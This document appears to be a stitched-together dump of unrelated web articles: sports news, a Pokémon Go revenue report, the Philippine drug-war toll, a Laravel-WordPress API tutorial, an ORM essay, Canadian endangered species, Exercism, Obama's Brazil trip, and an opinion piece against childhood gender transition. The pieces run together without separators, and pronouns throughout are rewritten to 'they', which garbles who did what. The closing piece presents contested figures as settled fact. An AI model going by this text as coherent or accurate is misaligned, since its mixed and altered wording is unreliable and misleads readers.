In August 2016, the 20 year-old was named in England's provisional EPS squad and they enjoyed a standout 2016/17 campaign which resulted in them being shortlisted for both the Young Player of the season, and Discovery of the Season Awards. They were also named as Supporters' Player of the Season at the club's 2016/17 End of Season Awards Dinner.
Marchant was set to be included in Eddie Jones' England squad to tour Argentina, but they were ruled out due to a toe injury before the uncapped match against the Barbarians at Twickenham.
Commenting on the news, Marchant added: “I am delighted to have re-signed with Harlequins. This is such a great club and I have loved my time here; it was an easy decision to stay. The future and potential for this group of players is incredibly exciting and I want to be part of that in the coming years."
(Reuters) - Apple Inc stands to rake in $3 billion in revenue from the Pokémon Go craze in the next one to two years as gamers buy “PokeCoins” from its app store, brokerage Needham & Co said.
A woman plays the augmented reality mobile game "Pokémon Go" by Nintendo, as a visitor uses an automated teller machine (ATM) at a branch of Sberbank in central Krasnoyarsk, Siberia, Russia, July 20, 2016. REUTERS/Ilya Naymushin
Pokémon Go, the augmented reality game from Japan's Nintendo Co Ltd, can be downloaded for free but iPhone users can use PokeCoins to buy additional features.
A pack of 100 PokeCoins costs 99 cents in Apple's app store, but the price can go up as much as $99.99 for a pack of 14,500. (apple.co/29j1uDa)
“We believe Apple keeps 30 percent of Pokémon Go's revenue spent on iOS devices, suggesting upside to earnings,” Needham analyst Laura Martin wrote in a client note on Wednesday.
Pokémon Go had 21 million active users in the United States alone as of July 18 - less than two weeks after going live.
The game, which has been rolled out in 35 countries, is also available on Android devices.
Martin said Pokémon Go's ratio of paid users to total users was 10 times that of Candy Crush, the hit game from King Digital that generated more than $1 billion of revenue in both 2013 and 2014.
Users in the United States are spending far more time playing the game than they are using Facebook or WhatsApp, according to app analytics firm Sensor Tower. (bit.ly/29EQaj0)
Electronics retailers have also seen a bump in sales of mobile chargers and charging cases since the launch of the game.
Up to Tuesday's close, Apple's shares had gained 5 percent in market value, or about $25 billion, since the launch of the game in the United States on July 6. Nintendo's stock has nearly doubled.
(In this July 20 story, corrects paragraph 10 to say that Pokémon Go launched in July 6, not June 6)
They may have lost out at the Emmys, where they were nominated for lead actor in a comedy series for Derek, but Ricky Gervais certainly knows how to make an impact. In an ad for Netflix, the US home of their series, they crash several of the streaming service's hit shows including House of Cards and Orange is the New Black. “You know when you're watching your favorite Netflix show, and after five straight episodes, you wanna be in it?” they ask viewers, before taking Kevin Spacey's role as Frank Underwood in the Oval Office. After a quick encounter with Lilyhammer's Steven Van Zandt, Gervais appears in Taylor Schilling's place in jail, clashing with the inmates because of their accent. “Maybe I'm better off just watching,” Gervais concludes.
Facebook Twitter Pinterest Ricky Gervais - Netflix ‘Superfan' ad
Even better is the outtake reel from the ad, which features the comedian ad-libbing and some witty jesting with House of Cards actor Michael Kelly.
People look through the windshield of a van where bodies of suspected drug pushers, who were killed when they allegedly fought back, were piled after the police operation in Novaliches on July 12, 2016. Jonathan Cellona, ABS-CBN News
MANILA - An average of 44 people are being killed each day in President Rodrigo Duterte's war on crime, according to police data released Tuesday that showed the death toll surging to nearly 3,000.
The new figures came after Duterte vowed on Monday to defy a wave of international condemnation and continue killing until every drug trafficker in the Philippines was dead.
"More people will be killed, plenty will be killed until the last pusher is out of the streets," said Duterte, who scored a landslide election victory in May largely on their promise to fight crime.
"Until the (last) drug manufacturer is killed, we will continue and I will continue."
Interactive: Casualties of the drug war
Tok, tok...bang, bang: The bloody war on drugs
Police have killed 1,033 people in anti-drug operations since Duterte was sworn into office just over two months ago, according to the Philippine National Police (PNP) update on Tuesday.
Another 1,894 people have died in unexplained deaths, police said, which rights group believe are largely due to out-of-control security forces and hired assassins.
The total of 2,927 is more than 500 higher than the figure released by police on Sunday, and equates to an average of 44 a day since Duterte took office on June 30.
US President Barack Obama was planning to raise concerns about the war on crime with Duterte at a meeting in Laos on Tuesday afternoon.
But Obama cancelled the meeting after Duterte warned they would not be lectured.
Philippine police insist they are killing only in self-defense.
"They have guns, they are drug-crazed. Our police officers are just defending themselves," national police spokesperson Dionardo Carlos told AFP.
Police chief Ronald dela Rosa has also regularly said the unexplained deaths are due to drug syndicates waging war against each other, rather than extrajudicial killings by vigilantes and others.
Still, Duterte has promised to protect police from prosecution if they are charged over the deaths and insisted human rights cannot get in the way of their war.
They have also urged ordinary Filipinos to kill drug addicts in their communities.
Dela Rosa last month called for drug addicts to kill traffickers and burn down their homes.
The United Nations special rapporteur on summary executions has warned incitement to kill is a crime under international law.
But Duterte has told the United Nations not to interfere and said they will use all means necessary to eradicate drugs in society, which they insist is the nation's biggest problem.
Making your own API is probably faster and easier than you thought. By using Laravel with WordPress I will guide you through how I was able to make an API in a few hours that has served 40+ websites and dished out more than 2 million events a month.
I will go over how to query the WordPress database using native WordPress queries from within Laravel. In part 2 I will show you how to improve performance with caching and some workflow improvements.
First a little background
I am responsible for a large automotive website, And about 40+ external dealership sites. Each site operates off of a number of different services like Leads, Images, Analytics, Data Collection, Vehicle Information to name a few. Each site is service driven and there for more or less static. Any Updates are done in HTML where needed otherwise I use a version of the API that I will be going over in order to make frequent edits to the site.
In total there are about 11,000 vehicles listed on Go Auto and anywhere from a couple of hundreds to a few thousand vehicles per dealership. Each site consists of information that needs to be managed and updated. Store information, Slides, SEO details, Campaign Landing Pages, and what I call nodes – flexible blocks of information that we might need.
The company site is its own instance and every single dealership site runs off of one Laravel instance like a large multisite. The infrastructure for these sites includes AWS servers with Docker containers and no Database.
All of these sites are also pushing close to 2 million pages views a month, Through caching the API served over 170,000 requests.
The API has allowed us to make updates that otherwise would require development time from my team. These updates can now be done by content creators or the design team.
Let's get Started!
For this to happen I have two URLs. One is the main API endpoint and the other one being the private WordPress admin.
In my case, I use a subdomain like admin.example.com and api.example.com, but you can use separate domains like laravel-api.com and api-admin.com.
Why Laravel?
So why not just use the WordPress JSON API? Using the WordPress API is a valid solution and likely a good one if you need to update WordPress content.
The WordPress API isn't without its own issues. In my experience and due to the nature of WordPress every API request will trigger a reaction to events and hooks within WordPress. Most of them unrelated to your actual API. It also requires you to register (endpoints)[https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/] but it's slow and who am I kidding? No one really likes to develop in WordPress.
Using Laravel gives us multiple advantages such as an easy interface for Caching, Routes, Authentication if we needed it, Debugging, Error reporting/logging and an easy way to handle Requests.
The Task At Hand
Build an API that can be updated easily
It has to be fast
It needs to handle a lot of requests
Needs to allow for the addition of new data
Start by Installing Laravel
Next, start off by grabbing a fresh copy of Laravel 5.4 by running composer create-project laravel/laravel blog "5.4.*" --prefer-dist .
If this command throws an error have a look at how you quickly set up a new Laravel project here.
Remember, This is a regular Laravel application so you can include other Composer packages if needed but that will be outside the scope of this article.
Now that we have that out of the way, Configure your API URL and set the document root to /public . Load your new API URL in the browser and you should see the Laravel Welcome Page.
Installing WordPress
WordPress will be installed within the root of the Laravel project folder.
If you have WP CLI installed then run wp core download --path=admin from within the Laravel project. If you don't have WP CLI installed then download WordPress manually from wordpress.org and extract the contents into your project folder.
Do not place WordPress in the public folder!
Install and setup WordPress as normal.
Download and install this simple theme. This theme won't have any templates or assets. It is a shell of a theme with only the minimum required to allow WordPress to register it.
I will touch on two other important features of this theme a little later on.
At this point, you should have a fully working and 100% stock WordPress install.
Make sure to configure your site to Visiting your site URL should be a blank page.
Setup your admin URL and make sure that your document root is /admin . You should now be able to visit the admin site and at this time it will be a regular WordPress install.
In order to let Laravel access WordPress functionality we need to make a few simple adjustments inside of WordPress.
Let's start by opening the wp-config.php file.
WordPress uses a web-based cron, not like the standard Unix cron jobs to deal with scheduled content, and clearing transients data. Feel free to leave it turned on if you think that you might want to take advantage of scheduled content but you will see a performance if you use New Relic to keep an eye on your performance.
// Disable WP Cron. define('DISABLE_WP_CRON', 'true');
As a note. It is possible to setup a server side cron that would request http://example.com/wp-cron.php?doing_wp_cron and it can trigger all the standard events for you.
Configuring Laravel
Open index.php inside of Laravel's /public folder, at the very top add the following:
/* |-------------------------------------------------------------------------- | WordPress |-------------------------------------------------------------------------- | | Integrate WordPress with Laravel core | */ define('WP_USE_THEMES', false); require __DIR__.'/../admin/wp-blog-header.php';
Read more on WP_USE_THEMES
Let's get the API up and running now!
If you would like to keep your api.example.com/api/v1 then ignore this step but personally, I want my URL to be api.example.com/v1. So we need to make a small change to Laravel's Route Service Provider.
Before we do this, there are two considerations to make:
Do we need API middleware?
And what do we want our URL to look like?
I don't need the middleware and do not want to have /api so all of my routes will be placed in the web.php route file.
If you find that you want to keep the middleware then open app/Providers/RouteServiceProvider.php and look for Route::prefix('api') somewhere around line 66 and change that to Route::prefix('v1') .
Otherwise rename
->group(base_path('routes/api.php'));
to
->group(base_path('routes/api-v1.php'));
Let's add two simple routes to deal with store information and staff.
Add the following routes to your API routes file.
Route::get('/stores', function () { return ['stores']; }); Route::get('/staff', function () { return ['staff']; });
Checking api.example.com/v1/stores you should see a simple output of
[ "stores" ]
It works! But wait.
Our test is good, So let's move this to a controller, create a new one called ApiController and update your routes to reflect this:
You might see fit to create a ‘StoreController' as well as a 'StaffController' which would be a good idea for your own API.
Create the index view:
public function index() { return [ 'store' => Request::url() . '/store', 'staff' => Request::url() . '/staff', ]; }
By accessing /v1 you should see:
{ "store": "http://api.example.com/v1/store", "staff": "http://api.example.com/v1/staff" }
We really don't have to list the endpoints but personally, I think its good design creates an accessible API.
Now create the store ”view”, staff will be functionally the same.
Log into your WordPress admin and Install and activate Custom Post Type UI.
Add a new post type called store. Optionally you can remove support for the editor and featured image.
Now install ACF. ACF is a premium plugin at $25 per site or $100 for a developer license. As far as I am concerned it's priceless and probably one of the most useful plugins ever made for WordPress. It puts structured and repeatable data at your fingertips.
Under Custom Fields, Create a new field group called Stores and add some fields to your store:
name – text
address – textarea
phone – text
email – email
image – image / image array / upload to post
Under location rules set the Post Type | Is Equal to | Store.
Adding a couple of stores. The title will be your API slug so add your title and change the slug if you need to, This will be independent of the store name and used for singular requests in your API.
We are about to pull it all together and really get into the meat and potatoes of the API.
So far we have installed Laravel and WordPress inside of your Laravel project. We changed a couple lines of code inside of the wp-config.php and have used two plugins to setup and add custom post types with inputs needed to populate data in the API. We also bootstrap WordPress in Laravel's index.php file giving us access to everything WordPress has to offer.
I didn't mention it previously but you could add custom functions to your WordPress functions.php like specifying custom media sizes.
Here is the complete store endpoint method if you want to jump right in, I will go into finer detail below.
public function store( $slug = null ) { if ( $slug === null ): $queryString = array( 'post_type' => 'store', 'posts_per_page' => - 1, 'orderby' => 'date', ); else: $queryString = array( 'post_type' => 'store', 'name' => $slug, 'posts_per_page' => 1, 'orderby' => 'date', ); endif; $query = new \WP_Query( $queryString ); $posts = $query->get_posts(); foreach ( $posts as $post ): $single_acf = get_fields( $post->ID ); if ( empty( $single_acf ) ) { $single_acf = null; } $object['results'][] = [ 'data' => $single_acf ]; endforeach; return $object; }
Accessing /store will setup the WordPress query for multiple items or posts requesting /store/store-name would result in a single lookup by the slug name.
Shocker! Did you notice that this is standard WordPress code?
From what I have found, anything you can do with WordPress queries can be done within these API endpoints.
Read more on WP_QWuery
if ( $slug === null ): $queryString = array( 'post_type' => 'store', 'posts_per_page' => - 1, 'orderby' => 'date', ); else: $queryString = array( 'post_type' => 'store', 'name' => $slug, 'posts_per_page' => 1, 'orderby' => 'date', ); endif;
Next, we will execute the query and assign it to $posts
$query = new \WP_Query( $queryString ); $posts = $query->get_posts();
Looping over the post object we can now get each stores post metadata using ACF.
foreach ( $posts as $post ): $single_acf = get_fields( $post->ID ); if ( empty( $single_acf ) ) { $single_acf = null; } $object['results'][] = [ 'data' => $single_acf ]; endforeach; return $object;
Finally, the object is returned.
You should be able to take what you have learned and build out the staff endpoint.
In Closing
As you can see if you have a basic to good understanding of WordPress and its relations you can accomplish a lot with a few lines of code and a handful of basic plugins.
This kind of API is very simple, it's also fast and flexible. The ability to leverage WordPress as an admin while taking full advantage of great plugins like ACF and Custom Post Type UI gives you an incredibly powerful API that has a familiar Admin interface.
You could get a little more adventurous and consider wildcard routes possibly allowing you to never need to make updates to the code base.
While not necessary I would recommend using WP Offload Media as this will place your WordPress media content into Amazon S3 giving you a bit more separation from the API in your Media URLs.
In the next article, I will go over how you can set up caching, Authentication headers, The ability to clear cache for a result, as well as adding some useful information to your API response.
Enjoy Part 2!
A Massachusetts gun store is the latest victim of Operation Choke Point, a Department of Justice and Federal Deposit Insurance Corporation initiative that limits banking access for industries it deems “high risk,” the store's owner claims.
“Recently I applied for a line of credit and was informed I was declined,” wrote Mark Cohen, the owner of Powderhorn Outfitters, based in Hyannis, Mass.
Cohen said they and their company, founded in 1978, were longtime customers of TD Bank.
“I was told my finances were fine and history was spotless, however they could not approve me because I sell guns.”
“Taken aback,” Cohen said they closed their accounts with the bank and then did some research. They discovered Operation Choke Point, an initiative that arose from the Financial Fraud Enforcement Taskforce, formed in 2009. With a stated goal of targeting fraudsters and scammers, the initiative created a list of industries that it deemed “high risk”.
The policy “groups gun manufacturers or dealers with Pot Dispensaries and the Porn Industry!” wrote Cohen.
By doing business with companies in “high risk” industries – which, according to a 2012 FDIC directive, include online tobacco, online gambling-related operations and payday lenders — banks invite further scrutiny from federal agencies. To avoid this, many banks merely drop customers in those industries.
Earlier this year, numerous adult film stars were notified that their banking accounts were suspended because of their line of work.
“In lieu of taking away our guns, they are placing these labels on us in an effort to remove funding for gun manufacturing,” wrote Cohen.
Earlier this month, the Washington Times, which has covered the issue in depth, listed a number of small gun retailers whose banks have “choked” their banking access.
“This letter in no way reflects any derogatory reasons for such action on your behalf. But rather one of industry. Unfortunately your company's line of business is not commensurate with the industries we work with,” read a letter sent from BankUnited N.A. to the owner of the Miami-based Top Gun Firearms Training & Supply, according to the Washington Times.
Some in the banking industry are critical of the regulation as well.
“We're being threatened with a regulatory regime that attempts to foist on us the obligation to monitor all types of transcations,” wrote Richard Riese, a senior vice president at the American Bankers Association, in an article last month, the Times noted.
“All of this is predicated on a notion that the banks are a choke point for all businesses,” wrote Riese.
TD Bank did not respond to a request for comment.
(h/t The Washington Times)
Follow Chuck on Twitter
The title might have hinted you that I'm going to diss ORMs and preach against using them at all cost. Well, that's correct for some cases, as it depends on what are you trying to accomplish in your project.
The reason I wrote this article is because I just think people are misusing ORMs like Hibernate for any kind of project and any kind of data modeling requirement, without considering the actual pros and cons and the consequences of their choice.
Optimize SQL queries, automatically, start free!
In this article I would try to avoid listing the pros and cons of using an ORM, as there are many of these articles out there (so you can Google it). My approach to this matter will be to guide you to which questions you should ask yourself when choosing whether to use an ORM in your next project or not.
In the article, I'll use Hibernate as an example for an ORM framework, but the same questions are relevant for other common ORM frameworks such as: Entity Framework, nHibernate, Django, DataMapper, CakePHP, Dapper, ADOdb, Axon ORM.
Question 1 – Is your data model static or dynamic?
Looking at the meaning of ORM (Object Relational Mapping), you probably already get a hint on the fact that ORMs are built for static data models, as they are using data mappings.
If your project requires a configurable data model stored in a relational database (such as MySQL), I advise you not to use ORM and look into other alternatives (In my opinion, writing SQL queries yourself can never be bad if you learn about it and do it right).
Question 2 – What's your project's main use case?
If 95% of your project's goal is achieved using simple CRUD (Create, Read, Update, Delete) operations, ORMs like Hibernate are your golden choice. They usually create very easy and optimized queries for such operations, and writing this operation will be a piece of cake using their libraries.
If that's not the case and you need other more complex functionalities in your system, ORMs might not be a good fit. How do I define “complex functionality”? Well, imagine how the queries of your main use cases look like – if the answer for a significant portion of that is complex / reporting / analytics queries, I wouldn't recommend going down the ORM path.
Question 3 – Are you using complex stored procedures?
If you're using / wrote some complex stored procedures as part of your project's logic, ORM might not be a good fit for you. ORMs usually fall short when things get too complicated (as they are working best with CRUD operations). If you have many of those stored procedures / complex queries with subselects or recursive queries, I would think twice whether to use ORM, at least for those use cases.
Question 4 – Are you using database-specific functionality?
ORMs are built for generality. That means that every time you go into the “customized” area, you'll fall short with ORM. If you are using keywords / functions / procedures which are unique to your database of choice, you might end up tweaking the system just to make things work and end up working a lot more than just implementing it yourself without ORM. If your project require a lot of this custom database work to be done (instead of using plain common SQL), please re-consider.
Summary
So to summarize, from my experience (and I'm sure some might disagree), ORMs are AMAZING for projects that are very CRUD oriented. For projects which hold complex queries and functionality within them, I would suggest using plain SQL and master it.
If you insist (and it might be correct) to use an ORM even when some of the above questions lead you to do otherwise, I think you should consider mixing and match the ORM framework with another framework that will allow you to take care of those complex queries – for example, JOOQ for Java.
Optimize SQL queries, automatically, start free!
If you are a programmer looking to decide whether to use ORM, my goal in this article was to save you the meeting with the DBA, where they tell you that you “need to take out this complex query out of Hibernate (or any other ORM) to optimize it and get 500% improvement in performance”.
The Canadian government may be shirking its legal responsibility to protect endangered plants and wildlife, a new study suggests.
Scientists found that 86 per cent of legally protected species in Canada either maintain the same level of risk or have deteriorated over time.
"What's at risk is biodiversity in Canada," says Brett Favaro, a research scientist with Memorial University's fisheries and marine institute, in an interview with Quirks & Quarks. "Extinction is forever ... If something goes extinct, this is millions of years of evolution that we're losing."
How Canada identifies at risk species
In Canada, animals become classified as at risk over a two-step process.
First, a group of scientists who make up the Committee on the Status of Endangered Wildlife in Canada (COSEWIC) assess a species by looking at its population trajectory, range of habitat and a number of other factors. They then determine if the species is:
Not at risk.
Data deficient, which means there is insufficient data to complete the assessment.
Special concern.
Threatened.
Endangered.
Extirpated, which means the species no longer exists in Canada's wilderness, but does elsewhere.
Extinct.
In the second step, the government considers COSEWIC's assessment. The Minister of Environment Leona Aglukkaq decides whether or not to list the species under the Species at Risk Act. It is designed to respect "the protection of wildlife species at risk in Canada," according to the Act.
The Cooper's hawk was a special concern species in 1983, but is no longer at risk. (Dean Fosdick/The Associated Press) "The government can choose not to list the species even if it needs listing," says Favaro. "That decision takes into account how expensive it would be to protect them."
Favaro was among a group of scientists studying how all the animals identified to be at risk have fared since COSEWIC started conducting assessments in 1977. They and their colleagues at the University of Victoria looked at every species that has been assessed multiple times and logged how often a species gets better, stays at the same level or gets worse.
"What we found was quite surprising to us," they say.
Eighty-six per cent of species stayed at the same risk level or deteriorated over time, they say, calling the situation "very concerning."
For example, COSEWIC assessed the black tailed prairie dog five times between 1978 and 2011. It was considered a special concern between 1978 and 2000, but in 2011, it was upgraded to threatened.
Critical habitats left unprotected
Favaro says part of the reason such a high number of animals maintain their risk level or get worse over time is because their habitat is not protected — despite the Species at Risk Act requiring that to be done.
If you're not protecting habitat, then no matter how long we leave something listed, it seems unlikely that it's going to recover and do better. - Dr. Brett Favaro
For more than half of assessed species, their critical habitat wasn't identified, Favaro explains. For the species that had their habitat identified, in a lot of cases it was only partially done, they say.
"If you're not protecting habitat, then no matter how long we leave something listed, it seems unlikely that it's going to recover and do better," they say.
They say the government needs to invest more in identifying at risk species' critical habitat and protecting it.
Much like it did in the case of the Cooper's hawk. The hawk was a special concern species in 1983, but is no longer at risk. Favaro credits that to the government's decision to ban DDT, a previously commonly used pesticide.
"So, we identified the problem and we addressed the problem," they say.
Favaro's study didn't examine how much it would cost the government to protect the habitats of at risk species, but believes the government has the responsibility to do so once an animal is listed under the Act.
"At that point, I don't think we should take half-measures," they say. "If we're going to list it, I think we should go all the way."
Many of us have a 2017 goal to improve our programming skills or to learn how to program in the first place. While we have access to many resources, practicing the art of code development independent of a specific job requires some planning. Exercism.io is one resource designed for this exact purpose.
Exercism is an open source project and service aimed at helping people level up in their programming skills using a philosophy of discovery and collaboration. Exercism provides exercises for dozens of different programming languages. Practitioners complete each exercise and then receive feedback on their response, enabling them to learn from their peer group's experience.
And what a lot of peers there are. Exercism racked up some impressive stats in 2016:
Participants from 201 different countries
29,000 participants submitted exercises since June 2013, with 15,500 of them submitting exercises in 2016 alone
15,000 participants provided feedback on exercise solutions since June 2013, with 5,500 of them providing feedback in 2016
50,000 visitors a month and over 12,000 each week
33 programming languages are currently supported by exercises, with another 22 in the works
The project provides a series of small wins to participants of all levels, allowing them to develop "a high degree of fluency even at a low level of proficiency," said Katrina Owen, founder of Exercism. While Exercism does not aim to teach participants enough to become employed as a programmer, its exercises give them a deep familiarity with a language and its foibles. This familiarity removes the cognitive burden of language from learners (fluency), allowing them to focus instead on the more difficult problems of architecture and best practices (proficiency).
Exercism does this through a series of (what else?) exercises. A programmer downloads the command line client, retrieves the first exercise, adds code that fulfills the exercise, and then submits the solution. After submitting a solution the programmer can study the solutions of others and learn from different approaches to the same problem. More importantly, each solution receives feedback from other participants.
Feedback is the superpower of Exercism. All participants are encouraged not only to receive feedback, but also to provide it. According to Owen, members of the Exercism community learn more from providing feedback than from completing the exercises themselves. "It's a powerful learning experience. You're forced to articulate gut feelings and to examine your assumptions, habits, and biases," they said. They also pointed out that feedback can take many forms.
"Just go in and make observations and ask questions," said Owen.
Those who are new to programming, or even just to a specific language, can provide valuable feedback by questioning assumptions while also learning through collaboration and dialog.
Beyond just enabling bite-sized learning of new languages, Exercism itself strongly supports and encourages new contributors to the project. In an article on SitePoint.com, Owen stressed that, "If you want to contribute code to open source, the level of skill you need is 'good enough.'" Exercism not only encourages new contributors, but as a project it does everything possible to help new contributors land their first patch. To date nearly 1,000 people are contributors to the Exercism project.
New contributors will have plenty to keep them busy. Exercism is currently reviewing the health of its language tracks with an eye toward making all tracks sustainable and avoiding maintainer burnout. It's also seeking donations and sponsorships to hire designers to improve the usability of the site.
These improvements are necessary for the health of the site and for the well-being of Exercism's participants, but also these changes encourage and ease the path for new contributors to join, said Owen. "The product side would be much more maintainable if we could get this redesigned... When the user experience is a mess, there really is no point in having gorgeous code," they said. The project has a very vibrant discussion repo where community members collaborate to discover the best new approaches and features.
Those who want to keep tabs on the project but not yet participate can follow along on the behind the scenes mailing list.
President Obama is briefed on the situation in Libya during a secure conference call in Rio de Janeiro, Brazil, March 20, 2011. White House Photo by Pete Souza
This morning in Rio de Janeiro, President Obama along with their family toured the Ciudad de Jesus favela and kicked a soccer ball with a local boy. But their trip to South America has been more than just sightseeing and diplomacy.
Throughout their day in Brasilia yesterday and now in Rio de Janeiro, the president has led a two track agenda -- one, the task at hand of their push to get American goods into the booming Brazilian economy, and the other, beginning military action across the Atlantic in Libya.
Speaking to the people of Rio today, Mr. Obama made only a passing mention of the conflict, "We've seen the people of Libya take a courageous stand against a regime determined to brutalize its own citizens."
But their lack of words today doesn't mean Libya hasn't been front and center in their day. Hours before they left their hotel for their tour and speech here, they were briefed on the latest on the military operations in Libya by their top national security aides, including Secretary of State Hilary Clinton and Secretary of Defense Robert Gates.
The tone of their five-day trip to South America so far has been a balance of their two priorities.
After a day of meetings Saturday with Brazil's President Dilma Rousseff, that included sharing a toast at a luncheon for business leaders, the president made a powerful statement, announcing America's involvement in Libya.
"Today I authorized the Armed Forces of the United States to begin a limited military action in Libya in support of an international effort to protect Libyan civilians. That action has now begun," they said.
front page of newspaper O Globo in Brazil during President Obama's visit, March 20, 2011 CBS
A Brazilian newspaper, O Globo, has a stark headline today over a photo of the two leaders clinking glasses, playing up the juxtaposition of the president's disparate goals (see at left).
It says: "No Brasil, Obama ordena ataque a Libia.."
It means: "In Brazil, Obama orders attack on Libya."
Libya has overshadowed the president's entire journey to Brazil. As the White Press Corps was getting settled in Brasilia on Friday, even before they took off, the president was preparing for action in Libya. They held a meeting in the Oval Office with top aides to finalize the military plans in Libya, just a day after the United Nations Security Council voted to authorize a ceasefire and no-fly-zone.
According to the White House, the president had another briefing Saturday morning aboard Air Force One before they landed in Brazil.
Once in their hotel, they had yet another briefing, and a phone call, placed by the president to the crown prince of the United Arab Emirates, one of the key allies in the Libyan response.
The president then began the usual pomp and circumstance of their visit, including an elaborate arrival ceremony and a bilateral meeting with President Rousseff. The two leaders were scheduled to make remarks around 11 am. The press were kept waiting for hours, and eventually, well after noon, the leaders spoke. The president made a brief mention of Libya and moved on to the lunch.
Later the press was told that the delay was due to another briefing with top military leaders and a phone call with Secretary Clinton who had concluded a meeting with world leaders in Paris on how to proceed with military action in Libya.
So even overseas, and with an economic agenda in front of him, the president has been fully briefed on the situation in Libya and has woven urgent phone calls and briefings into days packed with diplomatic niceties and sightseeing. Proving that even thousands of miles from the White House, the president is never far from the juggling act that their job requires.
Obama content in background over Libya
Obama takes trade mission to Latin America
Obama in Brazil - no questions please
Lewis Holtby enjoyed the Spurs bragging rights over Sandro and Brazil after Germany's World Cup semi-final victory - and now Erik Lamela is in their sights.
Argentina meet Germany in the World Cup Final in the Maracana Stadium, Rio on Sunday (8pm UK).
After Germany beat Brazil 7-1 in the semi-final, can Argentina stop the favourites from lifting the trophy again?
We asked Lewis (three full caps for Germany, Under-21 captain) and Erik (six caps for Argentina) to preview the final - here's what they had to say at the Training Centre this week.
Who is going to win the final?
Lewis: “Is that a serious question? It will be 2-0 to Germany, I'm certain.”
Erik: “It's a difficult game. I hope Argentina will win.”
What is the key to winning this final?
Lewis: “It's the same answer from me as the semi-final against Brazil. Germany is up for it, they are a mature team and you saw that in the last game, they are clever, they have the right tactics and they have players who know how to play in a major final. They also have the guts to play aggressive, attacking football and they will go for it. Not forgetting, they also have a brilliant goalkeeper.”
Erik: “The most important thing for Argentina is concentration and for our great players, for example Lionel Messi, to go out and win the game for us.”
Look out tomorrow for the views of Mauricio Pochettino...
John O'Rourke will surely never forget their wedding day.
Not only did the Indiana University Police Department officer tie the knot on March 28, they also saved a little girl's life. O'Rourke pulled off the heroic deed at the “Donuts to Go” bakery in Sanford, Florida, on the morning of their nuptials.
They were standing in line to grab some breakfast when they saw a crowd gathering around an unconscious 3-year-old who'd just had a seizure.
O'Rourke got a bystander to dial 911 so that they could speak to a dispatcher. They then performed mouth-to-mouth resuscitation and chest compressions on the unidentified child. They regained consciousness just as paramedics arrived.
“It had to be a donut shop,” said O'Rourke, who usually patrols the campus of Indiana University–Purdue University Indianapolis, via a statement on Facebook. “You can't make this up.”
With the youngster in the care of the medical professionals, shop staff gave O'Rourke a free box of donuts to express their gratitude for their actions.
Over the past six years there has been a 930% increase in the number of children referred to NHS gender clinics across the UK, including one three-year-old and three four-year-olds since April last year. The BBC report shows that the total number of 94 children referred in 2009-10 has increased to 969 in 2015-16.
The report includes the story of a five-year-old Nottinghamshire boy who has just returned to the classroom ‘as a girl' with support from the school, which sent out letters to parents and children explaining the change. The reaction of the adults around this case, as reported in the Nottingham Post, provides an insight into the reason why the number of children referred to gender clinics has increased so dramatically over the last six years.
First, Colin Pettigrew, the local council authority's director for children, families and cultural services, said: “Transgender is a characteristic protected by law and therefore head teachers across England continue to, and are required to, agree a clear plan to support the needs of transgender children and young people.”
‘Transgender' as a protected category for children means that we have already made up our minds about an identity which over 80% of children will outgrow by adolescence. The most likely outcome for this little boy, if left alone, is that they will grow up to be gay, but there is no protected category of homosexuality for children as this only applies when a child matures and develops a sexual orientation: we can't predict that a child will be gay or lesbian. We also can't know if a child will grow up to be transgender, but the likelihood is far far less. Establishing ‘transgender' as a protected category of childhood presupposes, and reinforces, a fixed opposite-sex heterosexual identity before a gay or lesbian child has had the chance to explore, develop and mature. The only protected characteristic we should insist on for children is ‘childhood.'
Next, there are some statements from Maria Kontogianni, Senior Lecturer in Psychology with Sociology at Nottingham Trent University. They say:
“Children could start feeling gender dysphoria from the age of three-years-old.”
“They will say that they don't feel like a boy or girl or they may decide they are not.”
“If the school or parents do not respond correctly it can become a real problem for the child.”
“If it is done correctly you could have a very happy child and the key is to engage the family and teachers in the process because many will try to tip-toe around the subject.”
“The school will have to use words the child wants them to use and most adults and children choose the gender they want to be and then use which toilet they want and dress how they wish.”
“The best thing that can be done is talk about it and not ignore it because it won't go away.”
“Before people were forced to conform to gender normality but that is not the case now.”
Inaccurate and misleading comments such as these from academics must go a long way in influencing both parents and teachers. Here we have a confident diagnosis of ‘gender dysphoria' at age three, which would apply to a large number of little children who like dressing and playing with toys which are arbitrarily designated for the opposite sex. We are told that it's up to a child to decide whether they are a boy or a girl, told the ‘correct' response is to do everything the child wants in order to create a ‘very happy' child, and warned that if we respond ‘incorrectly' we will create a ‘real problem' for the child. We must ‘talk about it' rather than just allow the child to get on with exploring and discovering the world without being labelled. We are told that we should not ignore it because ‘it won't go away' when the overwhelming likelihood is that it will. And finally, deciding a child's sex by the toys they play with is seen as the opposite to forcing them to ‘conform to gender normality' when in fact that's exactly what it is.
Lastly, we have the Gender Identity Research and Education Society (GIRES) who state their belief that schools and local authorities have a big part to play in supporting those that are ‘going through the process' and, to help them, they provide lesson plans to ‘teach young children about transitioning.'
To be clear, a child does not passively ‘go through the process;' affirming a child as the opposite sex and ensuring that everyone treats the child as such is always the adults' decision, not the child's. A child has no idea that it is not actually possible to change sex. It is the school's choice to teach children either that ‘gender identity' is stronger than biological sex, or that biological sex is a reality and gender is a social construct; all of this is the adults' responsibility.
Dr Polly Carmichael, director of the Tavistock Clinic's gender identity service, warns that research published in the Netherlands suggests that “for some young people who make an early social transition it may be difficult to de-transition if their gender identity develops in another direction” which is the inevitable result of rushing to socially transition young children. And how many kids will find it too difficult to detransition after being ‘affirmed' as the opposite sex throughout childhood by all the adults and children around them?
Dr Carmichael posits that “increased awareness and acceptance of gender issues – particularly via the media and social networks” is a likely factor in the increase in referrals of children to gender clinics.  They are right that over the last few years ‘trans kids' stories have proliferated throughout the mainstream media and all over social networks, but what remains unacknowledged is the one-sided and almost totally unquestioning nature of that reporting, as in the Nottingham Post article above.
The media has not been educating the public on ‘gender issues,' it has been promoting awareness and acceptance of transgender theory as uncontested truth, with no debate about this hypothesis which places ‘gender identity' as the new reality replacing biological sex. Nor has any public debate been possible in a climate where anyone questioning it is judged as bigoted, transphobic and in need of re-education.
With a supposedly free press failing in its duty to provide balanced reporting of facts, and acting instead as a mouthpiece for the transgender lobby, the number of parents referring their children to gender clinics will continue to soar. As, inevitably, will the number of confused young people who, on reaching full maturity, realise what has been done to them as children in the name of a political ideology everyone was too afraid to question.
Share this: Twitter
Facebook
Tumblr
Pinterest
Reddit
